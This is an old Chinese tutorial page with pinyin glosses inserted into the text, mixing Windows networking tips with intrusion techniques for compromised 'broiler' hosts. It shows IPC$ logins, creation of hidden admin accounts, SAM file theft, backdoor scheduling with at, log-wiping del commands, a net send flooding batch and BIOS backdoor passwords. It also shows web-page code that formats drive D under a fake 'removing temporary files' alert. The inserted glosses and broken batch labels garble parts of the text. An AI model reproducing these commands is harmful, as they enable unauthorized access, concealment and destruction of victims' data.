網絡基礎知(zhī)識大(dà)全--合肥眉裏俏網絡科技有限公司

中間會(huì)列出所有經過的路由器列表！這(zhè)些(xiē)路由器如果是暴露再防火牆外(wài)面的話(huà)，還可以看(kàn)到(dào)路由的IP（這(zhè)裏又涉及到(dào)了(le)另外(wài)一個問題：爲什(shén)麽要把路由放(fàng)在防火牆後面？原因呢(ne)，主要有兩點：1）保護路由器！因爲現(xiàn)在越來(lái)越多的攻擊和(hé)入侵已經開(kāi)始瞄準路由器了(le)；2）爲路由器減少負擔！如果所有的過濾功能(néng)統統都壓在路由器上(shàng)面，路由器的負擔就太大(dà)了(le)！）

7）簡單介紹一下(xià)cookie！

作(zuò)用(yòng)：記錄訪問者的一些(xiē)信息。例如利用(yòng)cookie記錄你(nǐ)所登陸這(zhè)個網頁的次數、登陸時(shí)曾經輸入的信息……

大(dà)家在Administrator的cookies目錄中可以看(kàn)到(dào)很(hěn)多的記事(shì)本文(wén)檔吧？這(zhè)些(xiē)都是cookie，雖然經過了(le)加密，但(dàn)是仔細查找的話(huà)，仍然能(néng)夠看(kàn)到(dào)一些(xiē)敏感信息！況且現(xiàn)在也(yě)已經有了(le)專門(mén)查看(kàn)cookie的軟件！

那麽，如何清除cookie呢(ne)？一般情況下(xià)，可以在Internet選項中的常規選項卡中看(kàn)到(dào)一個删除cookies的按鈕，點擊就可以清楚掉了(le)～

除此以外(wài)，還要在internet選項中的内容選項卡中找到(dào)自(zì)動完成按鈕，把裏面的四項都選中！然後點擊清除表單，清除密碼～

徹底禁止cookie的方法

a:在IE的Internet選項中，找到(dào)隐私選項卡！把裏面的滑塊拖到(dào)最上(shàng)面，邊上(shàng)寫着：阻止所有cookie

b:找到(dào)Windows目錄下(xià)的cookies目錄！把裏面的txt文(wén)件全部删除！，最後應該隻剩下(xià)一個index.dat文(wén)件！之後把這(zhè)個文(wén)件夾設置成隻讀就可以了(le)～

8）安裝2000的時(shí)候，速度會(huì)特别特别特别慢，怎麽加快(kuài)安裝速度呢(ne)？

在DOS上(shàng)面安裝，應該用(yòng)98啓動光盤來(lái)引導系統！然後按照下(xià)面的方法來(lái)做，可以提高(gāo)安裝速度：

g:/>cd windows -------假設G爲光驅 windows爲98的安裝目錄！

g:/windows>smartdrv -------加載smartdrv程序！加載後沒有任何提示信息！隻要不返回錯誤信息就是加載成功了(le)～這(zhè)時(shí)候安裝2K的話(huà)，速度會(huì)很(hěn)快(kuài)的哦～

9）Windows2K密碼忘記了(le)，如何才能(néng)進入系統？

Windows2K的用(yòng)戶配置信息和(hé)密碼保存在SAM文(wén)件裏！該文(wén)件位于：c:/winnt/system32/config目錄中！隻要删除這(zhè)個文(wén)件就可以了(le)～

另外(wài)，在c:/winnt/repair目錄中也(yě)同樣有一個SAM文(wén)件（這(zhè)個是前者的備份！）如果你(nǐ)在登陸肉雞的時(shí)候，copy前面那個目錄中的SAM文(wén)件，你(nǐ)會(huì)發現(xiàn)COPY不下(xià)來(lái)！呵呵，爲什(shén)麽？因爲運行着的2K系統會(huì)保護SAM文(wén)件啊～這(zhè)個時(shí)候你(nǐ)就COPY這(zhè)個就可以了(le)！

10)ping不到(dào)，tracert不到(dào)，但(dàn)是卻能(néng)用(yòng)nbtstat顯示對(duì)方的一些(xiē)信息，爲什(shén)麽？

因爲tracert和(hé)ping命令使用(yòng)的是ICMP協議(yì)！而nbtstat是通過對(duì)方的netbios端口來(lái)獲得對(duì)方的主機信息的！使用(yòng)的是UDP和(hé)TCP協議(yì)！如果對(duì)方僅僅隻對(duì)ICMP協議(yì)做了(le)禁止的話(huà)，那通過這(zhè)個命令獲得系統信息是正常的！

11）telnet上(shàng)去後，如何給對(duì)方開(kāi)共享？

開(kāi)共享的命令如下(xià)：net share c=c:/winnt/system 返回共享成功之後直接利用(yòng)//ip/c來(lái)訪問對(duì)方的system目錄了(le)～删除共享用(yòng) share c /del 命令就可以了(le)

12）如何判斷對(duì)方的具體操作(zuò)系統版本？

首先用(yòng)ver命令查看(kàn)對(duì)方的版本号！

如果是5.00.2195的話(huà)，爲2K；5.1.2600爲XP

從(cóng)這(zhè)裏可以區(qū)分出來(lái)到(dào)底是2K還是XP了(le)～下(xià)面進行更加具體的區(qū)分！

2K的pro和(hé)svr版本區(qū)分：

在telnet下(xià)，net shart查看(kàn)啓動的服務～如果對(duì)方開(kāi)啓了(le)Terminal Services服務的話(huà)，基本上(shàng)可以判斷爲svr以上(shàng)的版本了(le)～如果沒有開(kāi)啓，則爲pro！

XP的pro和(hé)home版的區(qū)分：

home edition是無法安裝iis的！所以，可以通過iis服務來(lái)判斷到(dào)底是home版或者是pro了(le)～

當然了(le)，如果對(duì)方是pro，但(dàn)是将iis删除（停用(yòng)）的話(huà)，就沒辦法判斷了(le)

13）如何查看(kàn)98的随機啓動的程序？

在98下(xià)有一個實用(yòng)配置程序（msconfig），中文(wén)名爲：系統配置實用(yòng)程序，調用(yòng)的方法是在：開(kāi)始--運行中輸入msconfig，在裏面，有一個啓動的選項卡，點擊後，可以看(kàn)到(dào)很(hěn)多随即啓動程序，如果前面帶有鈎的話(huà)，就是啓動時(shí)随機啓動的，取消的話(huà)就是把前面的小(xiǎo)鈎去掉就可以了(le)～除了(le)這(zhè)裏以外(wài)，還有config.sys、autoexec.bat、system.ini、win.ini幾個選項卡，他(tā)們分别對(duì)應這(zhè)幾個文(wén)件！隻不過在這(zhè)裏更方便查看(kàn)而已！

14）設置了(le)BIOS密碼，可是卻忘記了(le)，該怎麽辦？

如果是可以進入Windows的話(huà)，可以找找biospwds和(hé)cmospwd這(zhè)兩個軟件看(kàn)看(kàn)～

還有利用(yòng)DEBUG法：

簡單介紹兩種：

1）-o 70 16

-o 71 13

-q

2）-o 70 16

-o 71 16

-q

另一種方法：copy法：

copy con cmos.com

輸入下(xià)面10個字符：alt+176,alt+17,alt+230, p,alt+176,alt+20,alt+230,q,alt+205,空(kōng)格，然後按下(xià)F6并回車，退出，運行這(zhè)個cmos.com程序就可以了(le)～

如果不能(néng)進入Windows怎麽辦呢(ne)？

1）用(yòng)通用(yòng)密碼：

Award Bios密碼：j256,LKW-PPETER,wantgirl,EBBB,Syxz,AWARD? SW,AWARD_SW,j262,HLT SER,SKY_FOX,BIOSTAR,ALFARO_ME,lkwpeter,589721,awkard,h996,CONCAT,589589

AMI bios密碼：AMI,BIOS,PASSWORD,HEWITT RAND,AMI_SW,LKWPETER,A.M.I.

2）可以利用(yòng)CMOS放(fàng)電

15）如何再命令行下(xià)殺死對(duì)方進程？

利用(yòng)微軟的2K以上(shàng)操作(zuò)系統都是含有這(zhè)個工(gōng)具的！該工(gōng)具包含在2K光盤的/support/tools文(wén)件夾下(xià)！裏面有安裝程序，點擊後，就安裝了(le)2K的support tools工(gōng)具包，裏面有kill這(zhè)個工(gōng)具，這(zhè)時(shí)候再cmd下(xià)可以輸入kill/?，就可以看(kàn)到(dào)幫助了(le)，使用(yòng)這(zhè)個命令的格式是：kill pid （pid是進程的ID号！）再任務管理(lǐ)器中可以看(kàn)到(dào)進程的ID号

那再命令行下(xià)如何查看(kàn)進程呢(ne)？呵呵，這(zhè)就用(yòng)到(dào)了(le)系統自(zì)帶的有一個後門(mén)工(gōng)具了(le)：再剛才說得那個目錄中，還有一個工(gōng)具叫tlist ！直接輸入tlist就可以得到(dào)pid遇隊形程序的列表了(le)～

16）如何查看(kàn)本機的DNS服務器？

ipconfig其實是可以的，還可以利用(yòng)一個命令：再cmd下(xià)輸入netsh，進入到(dào)netsh>提示符，再輸入：int ip 進入到(dào)interface ip> 然後再次輸入dump，這(zhè)時(shí)候屏幕上(shàng)出現(xiàn)當前連接的配置情況了(le)

1）查看(kàn)本機IP：首先鍵入netsh，再netsh>提示符下(xià)輸入：interface 回車之後：ip 回車再之後：show address 回車這(zhè)樣，就可以看(kàn)到(dào)當前連接的IP地址和(hé)子網掩碼。

2）修改網絡配置：接着上(shàng)面的命令，我們使用(yòng)：set address name=“本地連接” source=static addr=192.168.0.200 mask=255.255.255.0，這(zhè)樣就修改了(le)當前的IP地址，用(yòng)show address來(lái)看(kàn)

3）顯示一個完整的網絡配置教本：

剛才說過，第一個命令顯示的信息不如ipconfig/all全面，不用(yòng)着急，netsh再打印顯示網絡配置上(shàng)，還是有自(zì)己的特色的！例如：再interface ip>狀态下(xià)輸入：dump，會(huì)顯示一個清單，顯示所有本地連接（不管你(nǐ)是否使用(yòng)～）與netstat -an不完全一樣！

17）肉雞上(shàng)的部分文(wén)件無法删除，怎麽辦？

如果對(duì)方的文(wén)件夾是隻讀的話(huà)，會(huì)出現(xiàn)拒絕訪問的字樣！這(zhè)時(shí)候，我們可以再del命令後面加上(shàng)/f參數來(lái)删除！

18）再說一個可以限制用(yòng)戶登陸時(shí)間的命令！

再net命令中就可以實現(xiàn)這(zhè)樣的功能(néng)！具體方法如下(xià)：

假如我們打算(suàn)讓：coldcrysky這(zhè)個用(yòng)戶再周日到(dào)周易的上(shàng)午八點到(dào)下(xià)午四點之間可以登陸，用(yòng)這(zhè)個命令：

net user coldcrysky /timesunday-monday,08:00-16:00

之後利用(yòng)net user coldcrysky命令來(lái)查看(kàn)登陸時(shí)間的限制，可以看(kàn)到(dào)是我們所規定的時(shí)間

在此，特别提醒各位：命令中：星期日才是一周的開(kāi)始！！！不要當成星期一！

如果想恢複回去：net user coldcrysky /time:all --這(zhè)樣就可以了(le)～

19)如何删除windows2K的默認共享？

首先打開(kāi)記事(shì)本，輸入如下(xià)内容：

net share c$ /delete

net share d$ /delete

net share e$ /delete

net share f$ /delete

net share g$ /delete

net share ipc$ /delete

net share admin$ /delete

之後點擊保存成批處理(lǐ)文(wén)件（後綴爲：bat的文(wén)件！）！加入到(dào)啓動組中就可以了(le)～

20）139端口的又一用(yòng)法

1：Net use //XXX.XXX.XXX.XXX/ipc$ "password" /user:"username" 建立一個IPC連接

2：net use H: //XXX.XXX.XXX.XXX/C$ 将對(duì)方的C盤映射爲自(zì)己的h盤

3：copy c on h:/reboot.bat

Iisreset /reboot

CTRL+Z

在對(duì)方的C盤上(shàng)生成一個能(néng)重啓機器的文(wén)件

4：net time //XXX.XXX.XXX.XXX 得到(dào)對(duì)方機器時(shí)間

5：at //XXX.XXX.XXX.XXX 重啓的時(shí)間 c:/reboot.bat 設定對(duì)方重啓的時(shí)間！

6：at //XXX.XXX.XXX.XXX 查看(kàn)任務上(shàng)面是否添加了(le)這(zhè)個任務

7：等對(duì)方重啓好(hǎo)了(le)～

21）利用(yòng)批處理(lǐ)文(wén)件來(lái)建立一個記錄3389登陸者信息的記錄器

由于Terminal Service默認是沒有日志記錄的，隻能(néng)依靠他(tā)的系統日志，但(dàn)是系統日志隻能(néng)記錄一些(xiē)大(dà)動作(zuò)（開(kāi)啓或停止服務），那麽，如何用(yòng)批處理(lǐ)文(wén)件來(lái)編寫一個将是3389端口的程序呢(ne)？很(hěn)簡單：

建立一個批處理(lǐ)文(wén)件：内容如下(xià)：

@echo off

date/t >> c:/3389log.txt

:TS3389

time/t >> c:/3389log.txt

netstat -an | find "3389" |find "ESTABLISHED" >>c:/3389log.txt

goto :TS3389

之後保存！

22）網絡命令小(xiǎo)節

A、NET命令：

IPC連接：格式 net use //對(duì)方IP/ipc$ "密碼" user:"用(yòng)戶名" 『建立IPC連接～』

net use //對(duì)方IP/ipc$ /delete 『斷開(kāi)連接～』

以下(xià)操作(zuò)需要在連接到(dào)對(duì)方主機後才可進行！！！

net user coldcrysky xyz /add 『在連接的目标主機中加入一個用(yòng)戶名爲COLDCRYSKY 密碼爲WYZ的用(yòng)戶』

net localgroup Administrator coldcrysky /add 『把名爲coldcrysky的用(yòng)戶加入ADMIN組-以爲着權限的提高(gāo)』

net use z://對(duì)方IP/C$ 『把對(duì)方的C盤映射爲本機的Z盤-可依照需要更改映射盤符！』

net start telnet 『開(kāi)啓TELNET』

net user guest /active:yes 『激活GUEST』

net user guest coldcrysky 『把GUEST密碼改爲COLDCRYSKY』

B、AT命令：

查看(kàn)遠程機時(shí)間：net time //對(duì)方IP

加入一項新任務：

at //對(duì)方IP 時(shí)間文(wén)件名『用(yòng)來(lái)把自(zì)己上(shàng)傳的後門(mén)程序在制定時(shí)間運行，方便以後進入肉雞！』

C、TELNET命令：

telnet 對(duì)方IP 端口『作(zuò)用(yòng)不用(yòng)我說了(le)吧？？？』

D、FTP命令：

登陸：ftp 對(duì)方網址（IP地址）

上(shàng)傳文(wén)件：get 文(wén)件在本機完整路徑對(duì)方文(wén)件存放(fàng)完整路徑

下(xià)載文(wén)件：put 對(duì)方文(wén)件完整路徑本機存放(fàng)文(wén)件路徑

E、COPY命令：

在建立連接後（尤其是IPC$連接後，很(hěn)有用(yòng)的命令哦～）

⑴copy index.htm //127.0.0.1/c$/index.htm

『将本機index.htm文(wén)件複制到(dào)127.0.0.1的C盤下(xià)，如果要放(fàng)到(dào)對(duì)方的NT目錄下(xià)，則把C改爲admin$』

⑵copy //127.0.0.1/admin/repair/sam_ c: 『将遠程機數據庫文(wén)件拷貝到(dào)本機C盤根目錄下(xià)』F、SET命令：

主要用(yòng)于分析目标計(jì)算(suàn)機的基本信息用(yòng)！具體使用(yòng)方法請(qǐng)查找相關文(wén)件！

G、NBTSTAT命令：

nbtstat -A 對(duì)方IP （這(zhè)個A大(dà)寫）

『在其中顯示<037>前面的英文(wén)或數字就是計(jì)算(suàn)機名稱！當然，也(yě)可以利用(yòng)PING -A 對(duì)方ip的方法來(lái)查看(kàn)對(duì)方主機名！效果相同！！！』

H、SHUTDOWN命令：

『用(yòng)來(lái)關閉對(duì)方NT服務的命令』格式如下(xià)：

shutdown //IP地址 t:20

『20秒後自(zì)動關閉對(duì)方NT服務！由于對(duì)對(duì)方機器影響較大(dà)，慎用(yòng)！！！』

I、DIR命令：

還用(yòng)我說麽？大(dà)家是不是早就該掌握了(le)？？？（不知(zhī)道(dào)的還是查閱相關資料吧～～～）

J、ECHO命令：

echo coldcrysky >index.htm 『用(yòng)coldcrysky覆蓋掉原INDEX.HTM中所有内容』

echo coldcrysky >>index.htm 『把coldcrysky加入到(dào)index.htm中』

K、ATTRIB命令：

更改文(wén)件屬性用(yòng)，格式：

Attrib -r index.htm 『去掉隻讀屬性』（＋- 分别代表增加和(hé)減少）

L、DEL命令：

『删除日志的時(shí)候用(yòng)！』

del c:/winnt/system32/logfiles/*.*

del c:/winnt/system32/config/*.evt

del c:/winnt/system32/dtclog/*.*

del c:/winnt/system32/*.log

del c:/winnt/system32/*.txt

del c:/winnt/*.txt

del c:/winnt/*.log

M、PING命令：

-t ：ping制定IP，知(zhī)道(dào)網絡斷開(kāi)或按CTRL+C結束！

-a ：解釋PING IP的主機名

-n count ：發送count指定的ECHO數據包，默認爲4個！

23）開(kāi)啓服務和(hé)停止服務的net start and net stop

net start和(hé)net stop到(dào)底能(néng)開(kāi)啓什(shén)麽服務？其實這(zhè)點也(yě)不需要你(nǐ)強記，記住這(zhè)個命令就可以了(le)：net help start和(hé)net help stop，這(zhè)兩個會(huì)顯示出你(nǐ)所能(néng)開(kāi)啓的服務有那些(xiē)~~

24）關于雙系統的兩個問題：

A、如何在雙系統（98、2000）中安全删除2K？

先制作(zuò)一張Windows 98 的啓動軟盤，再用(yòng)它啓動你(nǐ)的計(jì)算(suàn)機，運行sys命令恢複Windows 98引導記錄後，再運行fdisk/mbr恢複主引導記錄，完成後進入Windows 98，把winnt 和(hé)system volumn information 目錄删除，再删掉C盤上(shàng)的boot.ini、bootfont.bin、ntldr、nydetect.com、bootsect.dos文(wén)件就行了(le)。

B、 Windows 98/XP雙系統啓動菜單修複

1.修複前，在BIOS中設置從(cóng)光驅啓動。用(yòng)Windows XP安裝盤啓動電腦(nǎo)，在加載必要的驅動後，出現(xiàn)Windows XP的安裝界面。有三個選項：

（1）要現(xiàn)在開(kāi)始安裝Windows XP，請(qǐng)按“Enter”鍵。

（2）要用(yòng)“恢複控制台”修複Windows XP安裝，按“R”鍵。

（3）要退出安裝程序，不安裝Windows XP，按“F3”鍵；

2. 按“R”鍵，進入“Microsoft Windows XP (TM) 故障恢複控制台”界面；故障恢複控制台提供系統修複和(hé)故障恢複功能(néng)。系統這(zhè)時(shí)會(huì)搜尋已安裝的Windows XP系統文(wén)件，然後顯示搜尋結果，并詢問“要登錄到(dào)哪個Windows XP安裝（要取消，請(qǐng)按Enter）”，選擇1. D:/Windows，回車，系統會(huì)再詢問“管理(lǐ)員密碼”，再鍵入安裝Windows XP時(shí)設置的管理(lǐ)員密碼，回車，出現(xiàn)D:/Windows〉，這(zhè)時(shí)需要輸入修複命令Fixboot，後面的參數爲啓動扇區(qū)要寫入的磁盤盤符，這(zhè)裏填入C:，回車。修複完成，鍵入Exit退出。重啓後就會(huì)看(kàn)到(dào)久違的雙重啓動菜單了(le)。并且，這(zhè)樣修複後基本不産生垃圾文(wén)件。

25）這(zhè)裏說幾個主頁惡意代碼

A、死循環代碼：

『把下(xià)列代碼加入到(dào)網頁中，可達到(dào)如上(shàng)效果』

說明(míng)：當含有這(zhè)段代碼的網頁被人點擊，連接就會(huì)不斷的打開(kāi)IE浏覽器，直到(dào)你(nǐ)的系統資源浪費到(dào)0％～隻有重新啓動才能(néng)正常使用(yòng)！

預防方法：禁用(yòng)所有的ActiveX控件和(hé)插件！因爲這(zhè)是一個ActiveX教本程序～

B、恐怖的大(dà)圖片：

『把下(xià)列代碼加入到(dào)網頁中，可達到(dào)如上(shàng)效果』

說明(míng)：當打開(kāi)這(zhè)樣的網頁，IE會(huì)不斷的解釋試圖打開(kāi)，但(dàn)由于圖片實在太大(dà)，超出了(le)其處理(lǐ)能(néng)力，所以

C、地震死機代碼：

『把下(xià)列代碼加入到(dào)網頁中，可達到(dào)如上(shàng)效果』

說明(míng)：是windows9x的設備名稱解析漏洞！

WINDOWS9x的/con/con設備名稱解析漏洞允許用(yòng)戶進行攻擊，倒是98死機。原理(lǐ)：我們知(zhī)道(dào)，CON是DOS下(xià)的特殊設備名，不允許做文(wén)件名，如果我們在DOS下(xià)鍵入如下(xià)命令：copy coldcrysky.txt con，系統會(huì)顯示coldcrysky.txt的内容，如果換成：copy coldcrysky.txt>con系統會(huì)提示文(wén)件不能(néng)拷貝到(dào)文(wén)件自(zì)身。如果吧con換成LPT或PRN，則輸出coldcrysky.txt到(dào)打印機。由此可見，CON代表文(wén)件本身，如果使用(yòng)/CON/CON命令，則意味着系統不斷調用(yòng)文(wén)件本身，視(shì)系統資源迅速枯竭，連按CTRL+ALT+DEL的機會(huì)都沒有～

解決辦法：

對(duì)于9X系統，強烈建議(yì)打補丁！！！2000和(hé)XP則不會(huì)死機～

D、格式化硬盤：（最恐怖的～～～慎用(yòng)！！！請(qǐng)勿用(yòng)于非法用(yòng)途！！！使用(yòng)後如果有任何負作(zuò)用(yòng)，後果自(zì)負！與傷寒天空(kōng)『ColdCrySky』；亂刀(dāo)留影無關！！！）

scr,Reset();

scr.Path="C://WINDOWS//StartMenu//Programs//啓動//startup.htm";

scr.Doc="

WSH.rUN(`start/m format.com d:/q/autotest/u`);

alert(`IMPORTANT : Windows is removing unused temporary files.`);

scr.write();

說明(míng)：當您浏覽了(le)網頁，會(huì)把startup.hta文(wén)件寫入啓動文(wén)件夾，并提示WINDOWS正在删除臨時(shí)文(wén)件！實際上(shàng)是在格式化你(nǐ)的D盤，代碼中的：F935DC22-1CF0-11D0-ADB9-00C04FD58A0B對(duì)應爲：Windows Scripting Host Shell Object。代碼中的：WSH全稱是：Windows Scripting Host，是微軟的一種基于32位系統平台與語言無關的教本解釋機制，它使得腳本能(néng)在WINDOWS桌面或命令提示符下(xià)運行～WSH所對(duì)應的程序WScript.exe是一個腳本語言解釋器，位于WINDOWS所在文(wén)件夾下(xià)，所以它可以像執行批處理(lǐ)文(wén)件一樣執行WSH腳本程序～

解決方法：1）更新您的浏覽器，使用(yòng)最新的浏覽器上(shàng)網！

2）修改msdos.sys，在其中加入：Bootmentu=0命令行，目的是禁用(yòng)啓動菜單。

3）吧format.com改名

4）禁用(yòng)WSH。具體方法：在win98中，從(cóng)添加删除程序中點擊WINDOWS安裝程序，打開(kāi)附件一項，将WINDOWS SCRIPTING HOST前面的選項去掉，就可以卸載掉WSH了(le)～～～win2000和(hé)xp的用(yòng)戶可以在我的電腦(nǎo)-工(gōng)具菜單-文(wén)件夾選項-選擇文(wén)件類型，找到(dào)VBS VBSCRIPT FILE選項，點擊删除！

26）系統自(zì)帶的系統工(gōng)具

1、msinfo32.exe

位于C:/Program Files/Common Files

Microsoft Shared/Msinfo/msinfo32.exe，顯示計(jì)算(suàn)機中的有關系統信息，可用(yòng)其診斷、解決計(jì)算(suàn)機問題并查看(kàn)遠程系統所生成的系統報(bào)告。

2、drwatson.exe --

位于C: /Windows /drwatson.exe，當某個應用(yòng)程序在運行過程中出錯時(shí)，它就會(huì)将出錯的程序以及出錯的内存地址一一記錄下(xià)來(lái)，并保存爲Windows的Drwatson子目錄下(xià)的*.wlg記錄文(wén)件。

3、sfc.exe

位于C:/Windows/System/sfc.exe，用(yòng)于自(zì)動搜索被改變、删除或損壞了(le)的系統文(wén)件。

4、msconfig.exe

位于C:/Windows/System/msconfig.exe，通過修改啓動方式以及啓動時(shí)運行哪些(xiē)應用(yòng)程序等系統配置，從(cóng)而達到(dào)快(kuài)速排除故障的目的。

5、scanreg.exe

位于C:/windows/command/scanreg.exe（DOS版本）及C:/windows/scanregw.exe（Windows版本），用(yòng)于檢查、修複、備份以及還原系統注冊表及相關配置文(wén)件的工(gōng)具軟件，防止因注冊表數據被破壞而導緻的系統故障。

6、vcmui.exe

位于C:/Windows/vcmui.exe，在後台自(zì)動将被覆蓋的驅動程序備份下(xià)來(lái)，當我們安裝的新驅動出錯時(shí)可用(yòng)它進行恢複。

7、winrep.exe

位于C:/Windows/winrep.exe，能(néng)自(zì)動收集有關系統信息并提示用(yòng)戶輸入故障所在，幫我們編寫一篇完整的“求援”報(bào)告，并将其發送給有關技術維護人員，簡化“求援”操作(zuò)。

這(zhè)七個Windows自(zì)帶的小(xiǎo)程序可以在開(kāi)始菜單--運行中直接輸入文(wén)件名（無需輸入擴展名）調出該程序！

27）批處理(lǐ)在入侵中的幾則妙用(yòng)！

A、簡化IPC$登陸肉雞的操作(zuò)：

用(yòng)記事(shì)本建立一個名字爲：ipcruqin.bat的批處理(lǐ)文(wén)件，内容如下(xià)：

@net use //%1/ipc$ %3 /u:"%2"

@echo OK！已經成功建立連接

之後，大(dà)家在CMD下(xià)輸入：ipcruqin.bat 肉雞IP 肉雞的admin帳号/用(yòng)戶的密碼。就可以登陸上(shàng)去了(le)，而不需要那一大(dà)長串的命令了(le)！

B、批處理(lǐ)轟炸對(duì)方電腦(nǎo)：

打開(kāi)一記事(shì)本，在裏面輸入如下(xià)内容：

@echo 正在轟炸中……

tart

@net send %1 %2

@if errorlevel 1 goto over

goto start

ver

@echo 發送失敗

将其保存爲bat格式的文(wén)件即可，使用(yòng)方法：*.bat（該批處理(lǐ)文(wén)件的名字）+ 空(kōng)格 + 目标IP + 空(kōng)格 + 你(nǐ)要對(duì)他(tā)說得話(huà)！

這(zhè)次先簡單介紹這(zhè)三個！等下(xià)次有機會(huì)再給大(dà)家介紹更多的批處理(lǐ)文(wén)件的用(yòng)途！

28）再說幾個非常簡單實用(yòng)的DOS命令（工(gōng)具）：

A、fport.exe --查看(kàn)那些(xiē)端口都是那些(xiē)程序使用(yòng)的命令。

B、netstat -an --查看(kàn)那些(xiē)端口于外(wài)部的IP連接。比如這(zhè)裏顯示：23 XX.XX.XX.XX 而你(nǐ)又沒有開(kāi)23端口，那麽，呵呵……還用(yòng)我說麽？

C、letmain.exe //ip -admin -d --列出本機的administrators組的用(yòng)戶名查看(kàn)是否有異常。

D、pslist.exe --列出進程

E、pskill.exe --殺掉進程，有時(shí)候再任務管理(lǐ)器中無法終止程序，那就用(yòng)這(zhè)個工(gōng)具來(lái)停止進程。

F、login.exe --列出當前有那些(xiē)用(yòng)戶登陸再你(nǐ)的機器上(shàng)。

局域網應用(yòng)問題專題解答(dá)

問：在由三台電腦(nǎo)組成的局域網中，我在其中一台電腦(nǎo)上(shàng)用(yòng)過Windows優化大(dà)師後，爲什(shén)麽這(zhè)台電腦(nǎo)就不能(néng)登錄網絡，并且還提示找不到(dào)撥号适配器？

答(dá)：根據你(nǐ)說的情況，是沒有安裝“撥号網絡”。解決方法是：在“控制面闆”的“添加/删除程序”中，選擇“Windows安裝程序”，在“組件”的“通訊”中選擇“撥号網絡”，然後将Windows安裝盤放(fàng)入光驅進行安裝，重新啓動計(jì)算(suàn)機後就可使用(yòng)撥号網絡了(le)。

我新購的網卡在電腦(nǎo)上(shàng)無法安裝，而在其他(tā)電腦(nǎo)上(shàng)卻使用(yòng)正常，這(zhè)是怎麽回事(shì)？

答(dá)：如果在電腦(nǎo)中安裝好(hǎo)網卡後，系統沒有提示找到(dào)新硬件，你(nǐ)可運行“添加新硬件向導”來(lái)讓系統搜索新硬件。方法是單擊“開(kāi)始”，指向“設置”，單擊“控制面闆”，然後再雙擊“添加新硬件”。按照屏幕提示操作(zuò)。你(nǐ)可選“讓Windows搜索新硬件嗎？”，單擊“是（推薦）”，然後再單擊“下(xià)一步”，讓系統找到(dào)網卡再安裝其驅動。

而如果出現(xiàn)以下(xià)任何現(xiàn)象，網卡或者網卡所在的插槽損壞：

1、“添加新硬件向導”檢測不到(dào)網卡；

2、“添加新硬件向導”能(néng)夠檢測到(dào)網卡，但(dàn)無法正常工(gōng)作(zuò)。

爲了(le)确定到(dào)底是網卡還是插槽的問題，可以檢查網卡是否牢靠插入插槽之中。如果網卡已牢靠插入插槽之中，請(qǐng)改插到(dào)其他(tā)插槽之中試試。如果問題仍未解決，則可能(néng)是網卡損壞或與你(nǐ)的電腦(nǎo)不兼容，可更換之。

我的電腦(nǎo)出現(xiàn)“網上(shàng)鄰居”中找不到(dào)其他(tā)聯網電腦(nǎo)的故障，如何解決？

答(dá)：“網上(shàng)鄰居”是按工(gōng)作(zuò)組顯示計(jì)算(suàn)機的。如果你(nǐ)的電腦(nǎo)沒有設置工(gōng)作(zuò)組名稱，打開(kāi)“網上(shàng)鄰居”時(shí)就可能(néng)看(kàn)不到(dào)其他(tā)電腦(nǎo)。單擊“開(kāi)始”，指向“設置”，單擊“控制面闆”，雙擊“網絡”，然後再單擊“标識”選項卡。你(nǐ)局域網中所有電腦(nǎo)“工(gōng)作(zuò)組”框中的名稱應爲一樣，如有不同你(nǐ)可在此框中鍵入相同的工(gōng)作(zuò)組名稱，然後單擊“确定”重啓電腦(nǎo)既可。

此外(wài)，如果“網上(shàng)鄰居”中不出現(xiàn)“整個網絡”圖标，可能(néng)是在Windows中沒有安裝必要的網絡組件。要與網絡上(shàng)的其他(tā)計(jì)算(suàn)機連接，則必須安裝以下(xià)組件：Microsoft網絡客戶、網絡适配器、至少一種網絡協議(yì)（如IPX/SPX、TCP/IP等）。可打開(kāi)“網絡”，檢查“配置”選項卡上(shàng)的列表，确保已安裝了(le)各種必要的網絡組件。如有，你(nǐ)可重新安裝各種缺少的組件即可。

問：辦公室機器桌面的“網上(shàng)鄰居”圖标沒了(le)，能(néng)上(shàng)Internet，但(dàn)無法浏覽其他(tā)機器上(shàng)的資源了(le)，怎麽辦？

答(dá)：說明(míng)你(nǐ)的Internet屬性完好(hǎo)，但(dàn)網上(shàng)鄰居屬性中的“Microsoft 網絡用(yòng)戶”這(zhè)一客戶組件沒了(le)。

進到(dào)“控制面闆”中雙擊“網絡”，先在彈出的網絡對(duì)話(huà)框中點按“添加”按鈕，再從(cóng)随後彈出的“請(qǐng)選擇網絡組件類型”對(duì)話(huà)框中雙擊“客戶”，最後從(cóng)随後的“選擇網絡客戶機”對(duì)話(huà)框的左側選擇“Microsoft”後再選擇“Microsoft 網絡用(yòng)戶”，“确定”再“确定”并據提示重啓計(jì)算(suàn)機就ok啦！

問：右鍵中的“共享”命令已經顯身！但(dàn)我設了(le)共享不想讓别人從(cóng)網上(shàng)鄰居中看(kàn)到(dào)這(zhè)個共享目錄，隻有自(zì)己知(zhī)道(dào)且能(néng)實現(xiàn)異地機上(shàng)有完全操作(zuò)的權限。

答(dá)：找到(dào)你(nǐ)想要共享的文(wén)件夾并右鍵點選“共享…”----這(zhè)裏我就以共享“D:/Windows 98”爲例，先選中“共享爲”後在共享名“Windows 98(當然也(yě)可改名共享哦)”後加一英文(wén)狀态的“$”符，再選中“完全”并輸入設定好(hǎo)“密碼”，然後“确定”一次密碼就OK了(le)。

這(zhè)樣一來(lái)，絕對(duì)保證别人從(cóng)網上(shàng)鄰居中看(kàn)不到(dào)這(zhè)個共享目錄的！那~~自(zì)己想從(cóng)異地機上(shàng)進入并實現(xiàn)完全操作(zuò)時(shí)怎麽辦呢(ne)？呵呵，這(zhè)麽辦：從(cóng)異地機的地址欄中鍵入“//(機器名)/$(你(nǐ)的共享目錄名)”并“ENTER”，再輸入密碼并确定後，就進入啦！這(zhè)樣你(nǐ)可靜悄悄地實現(xiàn)異地機上(shàng)在自(zì)己設定的共享目錄内進行完全操作(zuò)啦！不過注意其中“/”不能(néng)誤輸入成“/”

問：如何使用(yòng)交換機的UpLink端口，怎樣連接？使用(yòng)了(le)UpLink口後，是否還可以使用(yòng)其相鄰最近的端口？

